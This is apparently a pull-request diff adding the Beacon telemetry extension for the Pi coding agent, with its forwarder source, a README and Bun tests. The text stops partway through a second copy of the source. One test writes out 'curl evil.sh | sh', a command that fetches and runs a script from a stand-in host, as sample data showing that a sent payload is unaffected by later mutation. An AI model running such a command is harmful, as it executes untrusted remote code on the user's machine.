### PR TITLE
Pi support 3/7: the Beacon Pi extension

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,6 +55,9 @@ jobs:
       - name: Check OpenCode plugin
         working-directory: plugins/opencode-beacon
         run: bun run check && bun test
+      - name: Check Pi extension
+        working-directory: plugins/pi-beacon
+        run: bun run check && bun test
       - name: Build embedded hooks binary
         working-directory: cli/beacon
         # hooks.bin is gitignored (build-time artifact). The CLI embeds it via

--- a/cli/beacon/internal/endpoint/hooks/assets/pi/beacon.ts
+++ b/cli/beacon/internal/endpoint/hooks/assets/pi/beacon.ts
@@ -1,0 +1,287 @@
+// __BEACON_MANAGED_MARKER__
+// Beacon endpoint telemetry extension for Pi (pi.dev).
+// Managed by `beacon endpoint hooks install --harness pi`; local edits are replaced on repair.
+//
+// This file is a forwarder and nothing else. It reads what Pi hands each event, shapes it into the
+// payload contract documented in cli/beacon-hooks/cmd/pi_event.go, and hands it to the Beacon hooks
+// binary. Every decision that could be wrong -- what counts as a file edit, what gets redacted, how
+// tokens map onto the schema -- is made in Go, because this file is the part that is hardest to test
+// and the part that cannot be fixed without rewriting installed copies.
+
+import { spawn } from "node:child_process"
+
+// Argv, not a shell command string.
+//
+// The opencode plugin runs its command through `/bin/sh -lc`, which is fine there and would not be
+// here: Pi installs through npm on Windows as readily as on macOS, and neither cmd.exe nor
+// PowerShell parses a POSIX-quoted command line. Spawning argv directly removes the shell from the
+// path entirely, so a profile directory containing a space, a `$`, or a backslash is carried as one
+// argument instead of being re-split by whatever shell happened to be involved.
+//
+// The whole array literal is the substitution token, so this file parses both before and after the
+// installer rewrites it -- which is what lets `bun --check` verify the template itself rather than
+// only the rendered copy.
+const beaconArgv: string[] = ["__BEACON_ARGV__"]
+
+// A hook that hangs would hang the agent turn behind it, so every send is bounded. Two seconds is
+// the same budget the opencode plugin uses; the work on the other side is one append to a local
+// file.
+const sendTimeoutMs = 2000
+
+const debugEnabled = process.env.BEACON_PI_DEBUG === "1"
+
+function debugLog(message: string, extra?: unknown): void {
+  if (!debugEnabled) return
+  // stderr, never stdout: Pi's print and JSON modes put machine-readable output on stdout, and a
+  // debug line there would corrupt whatever is parsing it.
+  try {
+    process.stderr.write(`beacon-pi: ${message} ${extra === undefined ? "" : JSON.stringify(extra)}\n`)
+  } catch {
+    // Debug logging is best-effort by definition.
+  }
+}
+
+// send hands one payload to the hooks binary and resolves when it is done.
+//
+// It never rejects. Telemetry that breaks the agent it is observing is worse than telemetry that
+// misses an event, so a missing binary, a non-zero exit, and a timeout are all logged and swallowed.
+function send(payload: Record<string, unknown>): Promise<void> {
+  const testSender = (globalThis as Record<symbol, unknown>)[Symbol.for("beacon.pi.testSender")]
+  if (typeof testSender === "function") {
+    return Promise.resolve((testSender as (value: unknown) => unknown)(payload)).then(
+      () => undefined,
+      () => undefined,
+    )
+  }
+  if (beaconArgv.length === 0) {
+    debugLog("no beacon command configured")
+    return Promise.resolve()
+  }
+
+  return new Promise<void>((resolve) => {
+    let child: ReturnType<typeof spawn>
+    try {
+      child = spawn(beaconArgv[0], beaconArgv.slice(1), {
+        stdio: ["pipe", "ignore", "ignore"],
+        windowsHide: true,
+      })
+    } catch (err) {
+      debugLog("spawn failed", { error: String(err), type: payload.type })
+      resolve()
+      return
+    }
+
+    // settle() is guarded because more than one of these paths can fire for the same child -- a
+    // timeout followed by the exit it caused is the normal case -- and resolving twice would leave
+    // the timer running for a process that is already gone.
+    let settled = false
+    const settle = () => {
+      if (settled) return
+      settled = true
+      clearTimeout(timer)
+      resolve()
+    }
+    const timer = setTimeout(() => {
+      debugLog("hook command timed out", { type: payload.type })
+      child.kill()
+      settle()
+    }, sendTimeoutMs)
+    // The timer must not be a reason for the process to stay alive: Pi exiting while a send is in
+    // flight should not wait out the full timeout.
+    timer.unref?.()
+
+    child.on("error", (err) => {
+      debugLog("hook command failed", { error: String(err), type: payload.type })
+      settle()
+    })
+    child.on("close", (code) => {
+      if (code !== 0) debugLog("hook command exited non-zero", { code, type: payload.type })
+      settle()
+    })
+    // EPIPE if the child died before reading; already reported through the error handler above.
+    child.stdin?.on("error", () => {})
+    child.stdin?.end(JSON.stringify(payload))
+  })
+}
+
+function firstString(...values: unknown[]): string {
+  for (const value of values) {
+    if (typeof value === "string" && value !== "") return value
+  }
+  return ""
+}
+
+// sessionId is the one field this file guesses at.
+//
+// Pi's session id is documented as reachable through ctx.sessionManager, but the accessor is not
+// named in the published extension docs, so several plausible spellings are tried and an empty
+// result is accepted. Beacon records an event with no session.id rather than dropping it, which
+// makes the failure mode "events arrive uncorrelated" instead of "no events arrive" -- recoverable
+// from the log, and visible to whoever installed it.
+function sessionId(event: Record<string, unknown>, ctx: Record<string, unknown>): string {
+  const manager = ctx?.sessionManager as Record<string, unknown> | undefined
+  const header = manager?.header as Record<string, unknown> | undefined
+  const session = manager?.session as Record<string, unknown> | undefined
+  return firstString(
+    manager?.sessionId,
+    manager?.sessionID,
+    manager?.id,
+    header?.id,
+    session?.id,
+    typeof manager?.getSessionId === "function" ? (manager.getSessionId as () => unknown)() : undefined,
+    event?.sessionId,
+    event?.session_id,
+  )
+}
+
+function sessionFile(ctx: Record<string, unknown>): string {
+  const manager = ctx?.sessionManager as Record<string, unknown> | undefined
+  return firstString(manager?.path, manager?.file, manager?.sessionPath, manager?.sessionFile)
+}
+
+// modelName renders "<provider>/<model>", matching how every other Beacon runtime reports a model.
+// Pi switches models mid-session, so this is read per event rather than captured once.
+function modelName(value: unknown): string {
+  if (typeof value === "string") return value
+  if (!value || typeof value !== "object") return ""
+  const model = value as Record<string, unknown>
+  const provider = firstString(model.provider, model.providerId, model.providerID)
+  const name = firstString(model.id, model.modelId, model.modelID, model.model, model.name)
+  if (provider && name) return `${provider}/${name}`
+  return name
+}
+
+// contentText flattens Pi's content blocks, keeping only the block types asked for.
+//
+// Pi delivers message and tool-result content as an array of typed blocks, and a plain String() of
+// that array yields "[object Object]" -- which would be recorded as the tool's output and hashed as
+// retained content, describing nothing.
+function contentText(content: unknown, types?: string[]): string {
+  if (typeof content === "string") return types ? "" : content
+  if (!Array.isArray(content)) return ""
+  const parts: string[] = []
+  for (const block of content) {
+    if (typeof block === "string") {
+      if (!types) parts.push(block)
+      continue
+    }
+    if (!block || typeof block !== "object") continue
+    const typed = block as Record<string, unknown>
+    const type = firstString(typed.type)
+    if (types && !types.includes(type)) continue
+    const text = firstString(typed.text, typed.content, typed.thinking, typed.reasoning)
+    if (text) parts.push(text)
+  }
+  return parts.join("\n")
+}
+
+function toRecord(value: unknown): Record<string, unknown> | undefined {
+  if (!value || typeof value !== "object" || Array.isArray(value)) return undefined
+  return value as Record<string, unknown>
+}
+
+export default function beaconEndpointExtension(pi: {
+  on: (event: string, handler: (event: any, ctx: any) => unknown) => unknown
+}): void {
+  // Every payload carries the same context. Built per event because cwd and the active model can
+  // both change during a session.
+  const base = (type: string, event: Record<string, unknown>, ctx: Record<string, unknown>) => {
+    const payload: Record<string, unknown> = { type }
+    const id = sessionId(event, ctx)
+    if (id) payload.session_id = id
+    const cwd = firstString(ctx?.cwd)
+    if (cwd) payload.cwd = cwd
+    const model = modelName(ctx?.model)
+    if (model) payload.model = model
+    const file = sessionFile(ctx)
+    if (file) payload.session_file = file
+    const reason = firstString(event?.reason)
+    if (reason) payload.reason = reason
+    return payload
+  }
+
+  // Handlers return nothing, deliberately and in every case.
+  //
+  // Pi reads a handler's return value as a directive: a truthy result from tool_call blocks the
+  // call, and one from tool_result or input rewrites what the agent sees. An observation-only
+  // extension that leaked its send() result would silently change the agent's behavior, which is
+  // exactly the failure a telemetry tool must not have. `void` on each call is what makes that
+  // impossible rather than merely unlikely.
+  pi.on("session_start", (event, ctx) => {
+    void send(base("session_start", event, ctx))
+  })
+
+  pi.on("session_shutdown", async (event, ctx) => {
+    // Awaited, unlike the rest: this is the last event of the session, and Pi may exit as soon as
+    // the handler resolves. Firing and forgetting here loses the session-end event on a fast exit.
+    await send(base("session_shutdown", event, ctx))
+  })
+
+  pi.on("input", (event, ctx) => {
+    const prompt = firstString(event?.text, event?.input, event?.value, event?.prompt)
+    if (!prompt) return
+    void send({ ...base("input", event, ctx), prompt })
+  })
+
+  pi.on("tool_call", (event, ctx) => {
+    void send({
+      ...base("tool_call", event, ctx),
+      tool_name: firstString(event?.toolName, event?.tool_name, event?.name),
+      tool_call_id: firstString(event?.toolCallId, event?.toolCallID, event?.tool_call_id),
+      // event.input is mutable and Pi may hand the same object to other extensions after this one.
+      // A shallow copy keeps the payload describing the arguments as they were at this moment.
+      tool_input: { ...(toRecord(event?.input) ?? {}) },
+    })
+  })
+
+  pi.on("tool_result", (event, ctx) => {
+    const details = toRecord(event?.details)
+    const response: Record<string, unknown> = {}
+    const output = contentText(event?.content)
+    if (output) response.output = output
+    if (details) {
+      response.details = details
+      // Hoisted to the top level because that is where Beacon reads a command's exit code from; a
+      // nested one would leave every shell result reporting no status at all.
+      const exitCode = details.exitCode ?? details.exit_code ?? details.exit ?? details.status
+      if (typeof exitCode === "number") response.exit_code = exitCode
+    }
+    void send({
+      ...base("tool_result", event, ctx),
+      tool_name: firstString(event?.toolName, event?.tool_name, event?.name),
+      tool_call_id: firstString(event?.toolCallId, event?.toolCallID, event?.tool_call_id),
+      tool_input: { ...(toRecord(event?.input) ?? {}) },
+      tool_response: response,
+      is_error: event?.isError === true,
+    })
+  })
+
+  pi.on("message_end", (event, ctx) => {
+    const message = toRecord(event?.message) ?? toRecord(event)
+    if (!message) return
+    // Only assistant messages carry usage and reasoning. A user message here would produce a
+    // response event with no model and no tokens, duplicating what the input event already said.
+    if (firstString(message.role) !== "assistant") return
+
+    const payload: Record<string, unknown> = { ...base("message_end", event, ctx) }
+    const model = modelName({ provider: message.provider, id: message.model }) || modelName(ctx?.model)
+    if (model) payload.model = model
+    // Pi's usage object is forwarded as-is. Beacon maps its members onto gen_ai.usage and drops
+    // what the schema has no member for; doing that translation here would put schema decisions in
+    // the layer that cannot be updated without a reinstall.
+    const usage = toRecord(message.usage)
+    if (usage) payload.usage = usage
+    const finish = firstString(message.stopReason, message.finishReason)
+    if (finish) payload.finish_reason = finish
+    const id = firstString(message.id)
+    if (id) payload.message_id = id
+    const reasoning = contentText(message.content, ["thinking", "reasoning"])
+    if (reasoning) payload.reasoning = reasoning
+
+    void send(payload)
+  })
+
+  pi.on("agent_end", (event, ctx) => {
+    void send(base("agent_end", event, ctx))
+  })
+}

--- a/cli/beacon/internal/endpoint/hooks/assets/pi/beacon.ts
+++ b/cli/beacon/internal/endpoint/hooks/assets/pi/beacon.ts
@@ -246,8 +246,10 @@ export default function beaconEndpointExtension(pi: {
       const exitCode = details.exitCode ?? details.exit_code ?? details.exit ?? details.status
       if (typeof exitCode === "number") response.exit_code = exitCode
     }
+    const durationMs = details?.durationMs ?? details?.duration_ms
     void send({
       ...base("tool_result", event, ctx),
+      ...(typeof durationMs === "number" ? { duration_ms: durationMs } : {}),
       tool_name: firstString(event?.toolName, event?.tool_name, event?.name),
       tool_call_id: firstString(event?.toolCallId, event?.toolCallID, event?.tool_call_id),
       tool_input: { ...(toRecord(event?.input) ?? {}) },

--- a/cli/beacon/internal/endpoint/hooks/assets/pi/embed.go
+++ b/cli/beacon/internal/endpoint/hooks/assets/pi/embed.go
@@ -1,0 +1,10 @@
+package piextension
+
+import _ "embed"
+
+// Template embeds the checked copy used by Beacon's Go installer.
+// The root source of truth lives at plugins/pi-beacon/src/beacon.ts.
+// Tests fail if this copy drifts.
+//
+//go:embed beacon.ts
+var Template string

--- a/plugins/pi-beacon/README.md
+++ b/plugins/pi-beacon/README.md
@@ -1,0 +1,53 @@
+# Beacon endpoint extension for Pi
+
+Beacon's telemetry adapter for [Pi](https://pi.dev), a terminal coding agent.
+
+Pi has no hooks configuration file and no OpenTelemetry support, so neither of Beacon's other two
+integration shapes applies to it. Its documented observation surface is the TypeScript extension
+API, so this is what Beacon installs: one extension that forwards the events it subscribes to.
+
+## What it does
+
+Subscribes to `session_start`, `session_shutdown`, `input`, `tool_call`, `tool_result`,
+`message_end` and `agent_end`, and hands each one to the `beacon-hooks` binary as JSON on stdin.
+The payload contract is documented in `cli/beacon-hooks/cmd/pi_event.go`, which is also where every
+mapping decision lives — what counts as a file edit, what gets redacted, how Pi's usage object maps
+onto `gen_ai.usage`. This file deliberately makes none of those decisions: it is the layer that
+cannot be fixed without rewriting installed copies, so it stays a forwarder.
+
+Local-only, like the rest of Beacon's endpoint execution. The extension makes no network calls; it
+spawns a local binary that appends to a local log.
+
+## Properties worth preserving
+
+- **Handlers return nothing.** Pi reads a handler's return value as a directive: truthy from
+  `tool_call` blocks the call, truthy from `input` or `tool_result` rewrites what the agent sees. An
+  observation-only extension must never leak a value into that channel.
+- **Failures are swallowed.** A missing binary, a non-zero exit, or a timeout is logged (with
+  `BEACON_PI_DEBUG=1`) and dropped. Telemetry that breaks the agent it observes is worse than
+  telemetry that misses an event.
+- **argv, not a shell string.** The command is spawned as an argv array with no shell, so paths
+  containing spaces or backslashes work on Windows as well as POSIX.
+- **`session_shutdown` is awaited.** It is the last event of the session and Pi may exit as soon as
+  the handler resolves.
+
+## Known gap
+
+Pi's session id is read through `ctx.sessionManager`, but the published extension documentation does
+not name the accessor. `sessionId()` tries several plausible spellings and accepts an empty result:
+Beacon records an event without `session.id` rather than dropping it, so an unknown shape degrades
+to uncorrelated telemetry instead of silence. Confirm the real accessor against a live Pi session
+and narrow the list; `beacon-hooks` needs no change either way.
+
+## Development
+
+```bash
+bun test              # unit tests, via an injected sender -- no process is spawned
+bun run check         # parse the template and verify the embedded Go copy is in sync
+bun run sync          # copy src/beacon.ts into the Go installer's embedded assets
+```
+
+`src/beacon.ts` is the source of truth. `cli/beacon/internal/endpoint/hooks/assets/pi/beacon.ts` is
+a checked-in copy that Go embeds, and a test fails if the two drift. The `__BEACON_ARGV__` and
+`__BEACON_MANAGED_MARKER__` placeholders are substituted at install time; the installer refuses to
+write a file that still contains an unresolved `__BEACON_` token.

--- a/plugins/pi-beacon/package.json
+++ b/plugins/pi-beacon/package.json
@@ -1,0 +1,18 @@
+{
+  "name": "@asymptote-labs/pi-beacon",
+  "version": "0.0.0",
+  "private": true,
+  "description": "Beacon endpoint telemetry extension for Pi",
+  "type": "module",
+  "scripts": {
+    "check": "bun --check src/beacon.ts && cmp src/beacon.ts ../../cli/beacon/internal/endpoint/hooks/assets/pi/beacon.ts",
+    "sync": "cp src/beacon.ts ../../cli/beacon/internal/endpoint/hooks/assets/pi/beacon.ts",
+    "test": "bun test src/beacon.test.ts"
+  },
+  "exports": {
+    ".": "./src/beacon.ts"
+  },
+  "files": [
+    "src/"
+  ]
+}

--- a/plugins/pi-beacon/src/beacon.test.ts
+++ b/plugins/pi-beacon/src/beacon.test.ts
@@ -1,0 +1,319 @@
+import { afterEach, beforeEach, describe, expect, test } from "bun:test"
+import beaconEndpointExtension from "./beacon"
+
+const payloads: any[] = []
+const senderKey = Symbol.for("beacon.pi.testSender")
+
+beforeEach(() => {
+  payloads.length = 0
+  ;(globalThis as any)[senderKey] = async (payload: any) => {
+    payloads.push(structuredClone(payload))
+  }
+})
+
+afterEach(() => {
+  delete (globalThis as any)[senderKey]
+})
+
+type Handler = (event: any, ctx: any) => unknown
+
+// register runs the extension factory and returns the handlers it subscribed, so a test can drive
+// one event the way Pi would.
+function register(): Map<string, Handler> {
+  const handlers = new Map<string, Handler>()
+  beaconEndpointExtension({
+    on: (name: string, handler: Handler) => handlers.set(name, handler),
+  })
+  return handlers
+}
+
+function context(overrides: Record<string, unknown> = {}) {
+  return {
+    cwd: "/repo",
+    model: { provider: "anthropic", id: "claude-sonnet-4" },
+    sessionManager: { sessionId: "pi-session-1", path: "/home/u/.pi/agent/sessions/x.jsonl" },
+    ...overrides,
+  }
+}
+
+describe("beacon Pi extension", () => {
+  test("subscribes to the events Beacon maps and nothing else", () => {
+    // Subscribing to an event Beacon drops costs a process spawn per occurrence for no telemetry.
+    expect([...register().keys()].sort()).toEqual([
+      "agent_end",
+      "input",
+      "message_end",
+      "session_shutdown",
+      "session_start",
+      "tool_call",
+      "tool_result",
+    ])
+  })
+
+  // Pi reads a handler's return value as a directive: truthy from tool_call blocks the call, and
+  // truthy from input or tool_result rewrites what the agent sees. An observation-only extension
+  // that returned its send() result would silently change the agent's behavior.
+  test("no handler returns a value that Pi would act on", async () => {
+    const handlers = register()
+    const events: Record<string, unknown> = {
+      session_start: { reason: "startup" },
+      input: { text: "hello" },
+      tool_call: { toolName: "bash", toolCallId: "c1", input: { command: "ls" } },
+      tool_result: { toolName: "bash", toolCallId: "c1", content: "ok" },
+      message_end: { message: { role: "assistant", content: [], usage: { input: 1, output: 1 } } },
+      agent_end: {},
+      session_shutdown: { reason: "exit" },
+    }
+    for (const [name, handler] of handlers) {
+      const returned = await handler(events[name], context())
+      expect(returned, `${name} returned a value Pi would treat as a directive`).toBeUndefined()
+    }
+  })
+
+  test("session_start carries session, workspace and model context", async () => {
+    const handlers = register()
+    await handlers.get("session_start")!({ reason: "resume" }, context())
+
+    expect(payloads).toHaveLength(1)
+    expect(payloads[0]).toMatchObject({
+      type: "session_start",
+      session_id: "pi-session-1",
+      cwd: "/repo",
+      model: "anthropic/claude-sonnet-4",
+      session_file: "/home/u/.pi/agent/sessions/x.jsonl",
+      reason: "resume",
+    })
+  })
+
+  // The session id is the one field this extension guesses at, because Pi's accessor is not named
+  // in the published docs. An unknown shape must still produce an event: uncorrelated telemetry is
+  // recoverable, silence is not.
+  test("an unknown sessionManager shape still emits the event", async () => {
+    const handlers = register()
+    await handlers.get("session_start")!({}, context({ sessionManager: { somethingElse: true } }))
+
+    expect(payloads).toHaveLength(1)
+    expect(payloads[0].session_id).toBeUndefined()
+    expect(payloads[0].cwd).toBe("/repo")
+  })
+
+  test("reads the session id from each accepted spelling", async () => {
+    for (const manager of [
+      { sessionId: "a" },
+      { sessionID: "a" },
+      { id: "a" },
+      { header: { id: "a" } },
+      { getSessionId: () => "a" },
+    ]) {
+      payloads.length = 0
+      const handlers = register()
+      await handlers.get("session_start")!({}, context({ sessionManager: manager }))
+      expect(payloads[0].session_id, `manager ${JSON.stringify(Object.keys(manager))}`).toBe("a")
+    }
+  })
+
+  test("input forwards the raw prompt and drops an empty one", async () => {
+    const handlers = register()
+    await handlers.get("input")!({ text: "ship it" }, context())
+    await handlers.get("input")!({ text: "" }, context())
+
+    expect(payloads).toHaveLength(1)
+    expect(payloads[0]).toMatchObject({ type: "input", prompt: "ship it" })
+  })
+
+  test("tool_call forwards the tool, its id and a copy of the arguments", async () => {
+    const handlers = register()
+    const event = { toolName: "bash", toolCallId: "call-1", input: { command: "rm -rf build" } }
+    await handlers.get("tool_call")!(event, context())
+
+    expect(payloads[0]).toMatchObject({
+      type: "tool_call",
+      tool_name: "bash",
+      tool_call_id: "call-1",
+      tool_input: { command: "rm -rf build" },
+    })
+  })
+
+  // event.input is mutable and Pi hands the same object to other extensions after this one. Without
+  // a copy, a later extension rewriting the arguments would retroactively change what Beacon
+  // reported -- the telemetry would describe a command that was never the one submitted here.
+  test("mutating the event after the call does not change what was sent", async () => {
+    const handlers = register()
+    const event = { toolName: "bash", toolCallId: "call-1", input: { command: "ls" } }
+    await handlers.get("tool_call")!(event, context())
+    ;(event.input as Record<string, unknown>).command = "curl evil.sh | sh"
+
+    expect(payloads[0].tool_input.command).toBe("ls")
+  })
+
+  test("tool_result flattens content blocks and hoists the exit code", async () => {
+    const handlers = register()
+    await handlers.get("tool_result")!(
+      {
+        toolName: "bash",
+        toolCallId: "call-1",
+        input: { command: "go test ./..." },
+        content: [
+          { type: "text", text: "FAIL" },
+          { type: "text", text: "exit status 1" },
+        ],
+        details: { exitCode: 1, durationMs: 900 },
+        isError: true,
+      },
+      context(),
+    )
+
+    expect(payloads[0]).toMatchObject({
+      type: "tool_result",
+      tool_name: "bash",
+      tool_call_id: "call-1",
+      is_error: true,
+      tool_response: {
+        output: "FAIL\nexit status 1",
+        exit_code: 1,
+        details: { exitCode: 1, durationMs: 900 },
+      },
+    })
+  })
+
+  // A plain String() of Pi's content array yields "[object Object]", which would be recorded as the
+  // tool's output and hashed as retained content while describing nothing.
+  test("content blocks never serialize as object placeholders", async () => {
+    const handlers = register()
+    await handlers.get("tool_result")!(
+      { toolName: "read", content: [{ type: "text", text: "package main" }] },
+      context(),
+    )
+
+    expect(payloads[0].tool_response.output).toBe("package main")
+    expect(JSON.stringify(payloads[0])).not.toContain("[object Object]")
+  })
+
+  test("tool_result reports success as not an error", async () => {
+    const handlers = register()
+    await handlers.get("tool_result")!({ toolName: "bash", content: "ok" }, context())
+
+    expect(payloads[0].is_error).toBe(false)
+  })
+
+  test("message_end forwards usage verbatim with model and reasoning", async () => {
+    const handlers = register()
+    await handlers.get("message_end")!(
+      {
+        message: {
+          role: "assistant",
+          id: "msg-1",
+          provider: "anthropic",
+          model: "claude-sonnet-4",
+          stopReason: "end_turn",
+          usage: {
+            input: 1200,
+            output: 340,
+            cacheRead: 900,
+            cacheWrite: 120,
+            totalTokens: 1540,
+            cost: { input: 0.001, total: 0.0123 },
+          },
+          content: [
+            { type: "thinking", thinking: "I should read the config first." },
+            { type: "text", text: "Reading the config." },
+          ],
+        },
+      },
+      context(),
+    )
+
+    expect(payloads[0]).toMatchObject({
+      type: "message_end",
+      model: "anthropic/claude-sonnet-4",
+      finish_reason: "end_turn",
+      message_id: "msg-1",
+      reasoning: "I should read the config first.",
+    })
+    // Forwarded unchanged: Beacon decides what maps onto the schema, including that totalTokens is
+    // dropped. Translating here would put schema decisions in the layer that needs a reinstall to fix.
+    expect(payloads[0].usage).toEqual({
+      input: 1200,
+      output: 340,
+      cacheRead: 900,
+      cacheWrite: 120,
+      totalTokens: 1540,
+      cost: { input: 0.001, total: 0.0123 },
+    })
+  })
+
+  test("message_end reports only the reasoning blocks, not the response text", async () => {
+    const handlers = register()
+    await handlers.get("message_end")!(
+      {
+        message: {
+          role: "assistant",
+          content: [
+            { type: "text", text: "Here is the answer." },
+            { type: "reasoning", text: "Because of X." },
+          ],
+        },
+      },
+      context(),
+    )
+
+    expect(payloads[0].reasoning).toBe("Because of X.")
+  })
+
+  // A user message here would produce a response event with no model and no tokens, duplicating
+  // what the input event already recorded.
+  test("message_end ignores non-assistant messages", async () => {
+    const handlers = register()
+    await handlers.get("message_end")!({ message: { role: "user", content: "hi" } }, context())
+
+    expect(payloads).toHaveLength(0)
+  })
+
+  test("a mid-session model switch is reflected per event", async () => {
+    const handlers = register()
+    await handlers.get("agent_end")!({}, context())
+    await handlers.get("agent_end")!({}, context({ model: { provider: "openai", id: "gpt-5" } }))
+
+    expect(payloads.map((item) => item.model)).toEqual(["anthropic/claude-sonnet-4", "openai/gpt-5"])
+  })
+
+  // session_shutdown is the last event of the session and Pi may exit as soon as the handler
+  // resolves, so this one is awaited rather than fired and forgotten.
+  test("session_shutdown resolves only after the payload is sent", async () => {
+    let released: () => void = () => {}
+    const gate = new Promise<void>((resolve) => {
+      released = resolve
+    })
+    ;(globalThis as any)[senderKey] = async (payload: any) => {
+      await gate
+      payloads.push(structuredClone(payload))
+    }
+
+    const handlers = register()
+    let settled = false
+    const pending = handlers.get("session_shutdown")!({ reason: "exit" }, context())
+    void Promise.resolve(pending).then(() => {
+      settled = true
+    })
+
+    await Promise.resolve()
+    expect(settled, "session_shutdown resolved before its payload was sent").toBe(false)
+
+    released()
+    await pending
+    expect(payloads).toHaveLength(1)
+    expect(payloads[0].type).toBe("session_shutdown")
+  })
+
+  // Telemetry that breaks the agent it observes is worse than telemetry that misses an event, so a
+  // failing sender must not surface as a rejected handler.
+  test("a failing send never rejects the handler", async () => {
+    ;(globalThis as any)[senderKey] = async () => {
+      throw new Error("hook binary is missing")
+    }
+
+    const handlers = register()
+    await handlers.get("session_shutdown")!({}, context())
+    expect(handlers.get("session_start")!({}, context())).toBeUndefined()
+  })
+})

--- a/plugins/pi-beacon/src/beacon.ts
+++ b/plugins/pi-beacon/src/beacon.ts
@@ -1,0 +1,287 @@
+// __BEACON_MANAGED_MARKER__
+// Beacon endpoint telemetry extension for Pi (pi.dev).
+// Managed by `beacon endpoint hooks install --harness pi`; local edits are replaced on repair.
+//
+// This file is a forwarder and nothing else. It reads what Pi hands each event, shapes it into the
+// payload contract documented in cli/beacon-hooks/cmd/pi_event.go, and hands it to the Beacon hooks
+// binary. Every decision that could be wrong -- what counts as a file edit, what gets redacted, how
+// tokens map onto the schema -- is made in Go, because this file is the part that is hardest to test
+// and the part that cannot be fixed without rewriting installed copies.
+
+import { spawn } from "node:child_process"
+
+// Argv, not a shell command string.
+//
+// The opencode plugin runs its command through `/bin/sh -lc`, which is fine there and would not be
+// here: Pi installs through npm on Windows as readily as on macOS, and neither cmd.exe nor
+// PowerShell parses a POSIX-quoted command line. Spawning argv directly removes the shell from the
+// path entirely, so a profile directory containing a space, a `$`, or a backslash is carried as one
+// argument instead of being re-split by whatever shell happened to be involved.
+//
+// The whole array literal is the substitution token, so this file parses both before and after the
+// installer rewrites it -- which is what lets `bun --check` verify the template itself rather than
+// only the rendered copy.
+const beaconArgv: string[] = ["__BEACON_ARGV__"]
+
+// A hook that hangs would hang the agent turn behind it, so every send is bounded. Two seconds is
+// the same budget the opencode plugin uses; the work on the other side is one append to a local
+// file.
+const sendTimeoutMs = 2000
+
+const debugEnabled = process.env.BEACON_PI_DEBUG === "1"
+
+function debugLog(message: string, extra?: unknown): void {
+  if (!debugEnabled) return
+  // stderr, never stdout: Pi's print and JSON modes put machine-readable output on stdout, and a
+  // debug line there would corrupt whatever is parsing it.
+  try {
+    process.stderr.write(`beacon-pi: ${message} ${extra === undefined ? "" : JSON.stringify(extra)}\n`)
+  } catch {
+    // Debug logging is best-effort by definition.
+  }
+}
+
+// send hands one payload to the hooks binary and resolves when it is done.
+//
+// It never rejects. Telemetry that breaks the agent it is observing is worse than telemetry that
+// misses an event, so a missing binary, a non-zero exit, and a timeout are all logged and swallowed.
+function send(payload: Record<string, unknown>): Promise<void> {
+  const testSender = (globalThis as Record<symbol, unknown>)[Symbol.for("beacon.pi.testSender")]
+  if (typeof testSender === "function") {
+    return Promise.resolve((testSender as (value: unknown) => unknown)(payload)).then(
+      () => undefined,
+      () => undefined,
+    )
+  }
+  if (beaconArgv.length === 0) {
+    debugLog("no beacon command configured")
+    return Promise.resolve()
+  }
+
+  return new Promise<void>((resolve) => {
+    let child: ReturnType<typeof spawn>
+    try {
+      child = spawn(beaconArgv[0], beaconArgv.slice(1), {
+        stdio: ["pipe", "ignore", "ignore"],
+        windowsHide: true,
+      })
+    } catch (err) {
+      debugLog("spawn failed", { error: String(err), type: payload.type })
+      resolve()
+      return
+    }
+
+    // settle() is guarded because more than one of these paths can fire for the same child -- a
+    // timeout followed by the exit it caused is the normal case -- and resolving twice would leave
+    // the timer running for a process that is already gone.
+    let settled = false
+    const settle = () => {
+      if (settled) return
+      settled = true
+      clearTimeout(timer)
+      resolve()
+    }
+    const timer = setTimeout(() => {
+      debugLog("hook command timed out", { type: payload.type })
+      child.kill()
+      settle()
+    }, sendTimeoutMs)
+    // The timer must not be a reason for the process to stay alive: Pi exiting while a send is in
+    // flight should not wait out the full timeout.
+    timer.unref?.()
+
+    child.on("error", (err) => {
+      debugLog("hook command failed", { error: String(err), type: payload.type })
+      settle()
+    })
+    child.on("close", (code) => {
+      if (code !== 0) debugLog("hook command exited non-zero", { code, type: payload.type })
+      settle()
+    })
+    // EPIPE if the child died before reading; already reported through the error handler above.
+    child.stdin?.on("error", () => {})
+    child.stdin?.end(JSON.stringify(payload))
+  })
+}
+
+function firstString(...values: unknown[]): string {
+  for (const value of values) {
+    if (typeof value === "string" && value !== "") return value
+  }
+  return ""
+}
+
+// sessionId is the one field this file guesses at.
+//
+// Pi's session id is documented as reachable through ctx.sessionManager, but the accessor is not
+// named in the published extension docs, so several plausible spellings are tried and an empty
+// result is accepted. Beacon records an event with no session.id rather than dropping it, which
+// makes the failure mode "events arrive uncorrelated" instead of "no events arrive" -- recoverable
+// from the log, and visible to whoever installed it.
+function sessionId(event: Record<string, unknown>, ctx: Record<string, unknown>): string {
+  const manager = ctx?.sessionManager as Record<string, unknown> | undefined
+  const header = manager?.header as Record<string, unknown> | undefined
+  const session = manager?.session as Record<string, unknown> | undefined
+  return firstString(
+    manager?.sessionId,
+    manager?.sessionID,
+    manager?.id,
+    header?.id,
+    session?.id,
+    typeof manager?.getSessionId === "function" ? (manager.getSessionId as () => unknown)() : undefined,
+    event?.sessionId,
+    event?.session_id,
+  )
+}
+
+function sessionFile(ctx: Record<string, unknown>): string {
+  const manager = ctx?.sessionManager as Record<string, unknown> | undefined
+  return firstString(manager?.path, manager?.file, manager?.sessionPath, manager?.sessionFile)
+}
+
+// modelName renders "<provider>/<model>", matching how every other Beacon runtime reports a model.
+// Pi switches models mid-session, so this is read per event rather than captured once.
+function modelName(value: unknown): string {
+  if (typeof value === "string") return value
+  if (!value || typeof value !== "object") return ""
+  const model = value as Record<string, unknown>
+  const provider = firstString(model.provider, model.providerId, model.providerID)
+  const name = firstString(model.id, model.modelId, model.modelID, model.model, model.name)
+  if (provider && name) return `${provider}/${name}`
+  return name
+}
+
+// contentText flattens Pi's content blocks, keeping only the block types asked for.
+//
+// Pi delivers message and tool-result content as an array of typed blocks, and a plain String() of
+// that array yields "[object Object]" -- which would be recorded as the tool's output and hashed as
+// retained content, describing nothing.
+function contentText(content: unknown, types?: string[]): string {
+  if (typeof content === "string") return types ? "" : content
+  if (!Array.isArray(content)) return ""
+  const parts: string[] = []
+  for (const block of content) {
+    if (typeof block === "string") {
+      if (!types) parts.push(block)
+      continue
+    }
+    if (!block || typeof block !== "object") continue
